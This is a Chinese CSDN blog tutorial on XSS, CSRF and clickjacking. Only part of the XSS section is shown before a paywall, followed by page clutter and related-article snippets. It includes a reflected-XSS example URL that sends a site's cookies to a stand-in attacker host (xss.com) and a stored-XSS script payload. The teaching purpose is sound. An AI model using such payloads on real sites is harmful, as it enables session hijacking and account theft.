以支付宝为例,聊聊Web安全的三个攻防姿势

最新推荐文章于 2024-08-08 22:10:43 发布
最新推荐文章于 2024-08-08 22:10:43 发布
阅读量364 收藏 2
点赞数 1
文章标签: web安全 网络安全 网络攻击模型 xss csrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hack0919/article/details/130847587
版权
本文探讨了Web安全的三个关键问题:XSS跨站脚本攻击,包括Reflected XSS、Stored XSS和DOM-based XSS;CSRF跨站请求伪造及其防范策略;以及点击劫持的威胁与防御措施,以支付宝为例说明攻击场景。了解这些攻击方式有助于提升Web应用的安全性。
摘要由CSDN通过智能技术生成

我们最常见的Web安全攻击有以下几种

  • XSS 跨站脚本攻击
  • CSRF 跨站请求伪造
  • clickjacking 点击劫持/UI-覆盖攻击

下面我们来逐个分析

一、XSS 跨站脚本攻击

跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

分类

  1. Reflected XSS(基于反射的XSS攻击)
  2. Stored XSS(基于存储的XSS攻击)
  3. DOM-based or local XSS(基于DOM或本地的XSS攻击)

Reflected XSS(基于反射的XSS攻击)

主要通过利用系统反馈行为漏洞,并欺骗用户主动触发,从而发起Web攻击。
举个栗子:

  1. 假设,在严选网站搜索商品,当搜索不到时站点会做“xxx未上架提示”。如下图。

 

  1. 在搜索框搜索内容,填入“”, 点击搜索。

  2. 当前端页面没有对填入的数据进行过滤,直接显示在页面上, 这时就会alert那个字符串出来。

 

(当然上图是模拟的)

以上3步只是“自娱自乐”,XSS最关键的是第四步。

  1. 进而可以构造获取用户cookies的地址,通过QQ群或者垃圾邮件,来让其他人点击这个地址:
http://you.163.com/search?keyword=<script>document.location='http://xss.com/get?cookie='+document.cookie</script>

  1. 如果受骗的用户刚好已经登录过严选网站,那么,用户的登录cookie信息就已经发到了攻击者的服务器(xss.com)了。当然,攻击者会做一些更过分的操作。

Stored XSS(基于存储的XSS攻击)

Stored XSS和Reflected XSS的差别就在于,具有攻击性的脚本被保存到了服务器并且可以被普通用户完整的从服务的取得并执行,从而获得了在网络上传播的能力。

再举个栗子:

  1. 发一篇文章,里面包含了恶意脚本 
    你好!当你看到这段文字时,你的信息已经不安全了!<script>alert('xss')</script>

  2. 后端没有对文章进行过滤,直接保存文章内容到数据库。

  3. 当其他读者看这篇文章的时候,包含的恶意脚本就会执行。

tips:文章是保存整个HTML内容的,前端显示时候也不做过滤,就极可能出现这种情况。
此为题多从在于博客网站。

如果我们的操作不仅仅是弹出一个信息,而且删除一篇文章,发一篇反动的文章,或者成为我的粉丝并且将这篇带有恶意脚

最低0.47元/天 解锁文章
白袍万里
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web安全入门(第八章-3)支付漏洞
Yzz_的博客
06-06 870
一、快捷支付原理 1,原理 ~浏览器跳转 简单说,你付钱了,浏览器通知服务器,服务器更新你的金额 //基本依托前端跳转,不可靠,现在应该极其少见 ~服务器端异步通知 简单说,你付钱,发一个通知给服务器, 同时,你支付的平台也会向服务器发送一个通知。 服务器对比一下你的通知与支付平台通知, 一致则更新你的金额。不一致,一般都会等待客服处理 //相对安全 2,补充 ~支付漏洞并不需要代码审计,其实更适合新手 ~支付漏洞属于逻辑漏洞
支付框架常见攻击面
yeshen4328的专栏
04-04 480
支付框架业务流程以及常见攻击面 主流支付框架 目前主流的支付应用有支付宝、微信支付、银联和百度支付,众多应用都集成了它们一种或者多种支付功能。在整个支付流程中包含一下几个部分(可能不同版本有些不同):支付应用服务器(cashier server,cs)、电商应用(merchant app,MA),电商应用服务器(merchant server,MS),以及支付应用SDK(TP-SDK)。 模型1:...
uni-app打开其他APP应用
weixin_40918145的博客
03-17 2405
uni-app打开其他APP应用
XSS -- 三种基本漏洞 (浅谈)
thj_blog
11-13 7193
一、  XSS 漏洞的验证         我们可以用一段简单的代码,验证和检测漏洞的存在,这样的代码叫做PoC(Proof of Concept)。验证XSS 漏洞存在的PoC 如下:               (1)&lt;script&gt;alert(/xss/)&lt;/script&gt;                      (2)&lt;script&gt;confirm('...
一个可大规模悄无声息窃取淘宝/支付宝账号与密码的漏洞 -(埋雷式攻击附带视频演示)
09-07 4361
一个可大规模悄无声息窃取淘宝/支付宝账号与密码的漏洞 -(埋雷式攻击附带视频演示) http://drops.wooyun.org/papers/1426 gainover · 2014/04/17 10:59 0x00 说在前面的话 下面是一段如何利用flash xss rookit漏洞来窃取淘宝/支付宝帐号密码的演示视频,当前漏洞已经修复 由于视频网站上传的均
Web安全三个攻防姿势
02-25
我们最常见的Web安全攻击有以下几种1.XSS跨站脚本攻击2.CSRF跨站请求伪造3.clickjacking点击劫持/UI-覆盖攻击下面我们来一一分析跨站脚本攻击(CrossSiteScripting),为了不和层叠样式表(CascadingStyleSheets,CSS...
web应用安全攻防策略.doc
11-21
web应用安全攻防策略.doc
Web安全三个XSS-CSRF-CLICK攻防姿
11-01
Web安全三个XSS-CSRF-CLICK攻防姿Web安全三个XSS-CSRF-CLICK攻防姿
常见Web安全漏洞的实际案例和攻防技术
02-15
### 常见Web安全漏洞的实际案例和攻防技术 #### 一、SQL注入攻击与防范 **实际案例** 在Web开发中,SQL注入是一种常见的安全威胁,它允许攻击者通过向应用程序发送恶意SQL代码来操纵数据库。例如,考虑一个简单的...
支付漏洞总结 / 在线支付流程安全分析
Omnictech的专栏
02-13 8122
前言 大家对支付漏洞的理解通常都是篡改价格,已有的对支付漏洞的总结也是对现有的一些案例的经验式归类,没有上升到对在线支付流程深入分析的一个层面。这里尝试从分析在线支付流程,在线支付厂商的接入方式开始,深入业务分析整个在线交易流程中容易出现的安全问题。 支付宝/在线支付流程 支付宝即时到账接口开发流程 在线支付从功能上来说是通过支付宝的支付渠道,付款者直接汇款给另一个拥有支付宝账号的收款者。
支付宝WAP支付接口开发
热门推荐
tspangle的专栏
10-09 13万+
支付宝WAP支付接口开发 因项目需要,要增加支付宝手机网站支付功能,找了支付宝的样例代码和接口说明,折腾两天搞定,谨以此文作为这两天摸索的总结。由于公司有自己的支付接口,并不直接使用这个接口,所以晚些时候打算把测试代码整理好放到Github上。 1. 开发前准备 到官网了解此接口的信息,下载样例代码(只有ASP.NET和PHP)以便随时参考。一个通过实名认证的企业支付宝
WEB安全新玩法 [10] 防范竞争条件支付漏洞
天存信息
10-30 2823
服务器端业务逻辑,特别是涉及数据库读写时,存在着关键步骤的时序问题,如果设计或代码编写不当就可能存在竞争条件漏洞。攻击者可以利用多线程并发技术,在数据库的余额字段更新之前,同时发起多次兑换积分或购买商品请求,从中获取利益。本文将讨论如何简单地使用 iFlow 应用安全加固平台的可编程特性,对竞争条件产生的支付漏洞进行防护。 一、原始网站 这是一个在支付环节存在竞争条件漏洞的站点:用户输入一个支付数值,系统将这个数值与余额比较,如果支付数值小于余额则允许支付,并从余额中减去支付数值。 攻击者编写并执行了
在线支付
JackChan
11-06 3464
1、在线支付概述什么是在线支付呢?没错,就是在网上花钱!大家一定有过这样的经历。但是你可能不太了解在线支付的“内情”,下面我们来了解一下!如果你现在开始经营一个电子商务网站,用户买了东西一定要支付,你的网站一定要可以连接各大银行了,然后在各大银行支付完成后,再返回到你的网站上显示“支付成功”!这就是今天我们要做的事情,连接银行的网银系统完成支付。说专业一点,我们称之为“开发在线支付的网关”2、两种在
Web安全之支付漏洞
yiyegugu的博客
09-26 1846
一、快捷支付原理 商户网站接入支付结果有两种方式,一种是通过浏览器进行跳转,一种是服务器端一步通知 基于用户访问的浏览器,如果用户在银行页面支付成功后,直接关闭了 页面,并未等待银行跳转到支付结果页面,那么商户网站就收不到支付 结果的通知,导致支付结果难以处理。而且浏览器端数据很容易被篡改 而降低安全性 该方式是支付公司服务器后台直接向用户指定的异步通知URL发送参数 采用POST或GET的方式。商户网站接收异部参数的URL对应的程序中, 要对支付公司返回的支付结果进行签...
软设之网络安全控制
最新发布
2301_81968528的博客
08-08 352
漏洞检测和安全风险评估技术,可预知主体受攻击的可能性和具体指证将要发生的行为和产生的后果。网络漏洞扫描技术主要包括网络模拟攻击,漏洞检测,报告服务进程,提取对象信息以及测评风险,提供安全建议和改进等功能,帮助用户控制可能发生的安全事件,最大可能消除安全隐患。IDS设备对于网络中的入侵行为往往是采用将入侵行为计入日志,并向网络管理员发出报警的方式来处理的,对于入侵行为并未主动的采取对应措施,响应方式单一。防火墙的作用是防止不希望的,未经授权的通信进出被保护的内部网络,通过边界控制强化内部网络的安全策略。
C++在网络安全领域的应用
2302_79331124的博客
08-04 1125
总的来说,C++在网络安全领域的应用广泛且深入。其高性能、灵活性和对底层硬件的控制使其成为开发各种安全解决方案的理想选择。随着网络安全威胁的不断演变,C++将继续在保护数字世界的过程中发挥重要作用。如果你对网络安全感兴趣,学习和掌握C++无疑将为你的技术发展方面提供强大的助力。
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
m0_57291352的博客
08-06 1010
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
Web安全学习
荆鹏的博客
08-06 375
应用层:为用户为用户的应用进程提供网络通信服务协议——DNS协议、HTTP协议、HTTPS协议传输层:负责两台主机之间的数据传输,将数据从发送端传输到接收端协议——TCP协议、UDP协议网络层:负责传输的地址管理和路由选择,在众多复杂的网络环境中确定一条合适的路径协议——IP协议数据链路层:负责设备之间数据帧的传送和识别,将网络层传递的数据报封装成帧,在处于同一个数据数据链路节点的两个设备之间传输协议——ARP协议、MTU协议。
Web前端安全:混淆代码与攻防技术
"Web前端黑客技术揭秘 - 钟晨鸣,徐少培编著 - 揭示Web前端安全攻防技巧,包括XSSCSRF、界面操作劫持等,适合前端工程师和对Web安全感兴趣的读者" 在网络安全领域,尤其是Web应用中,混淆代码是一种常见的技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值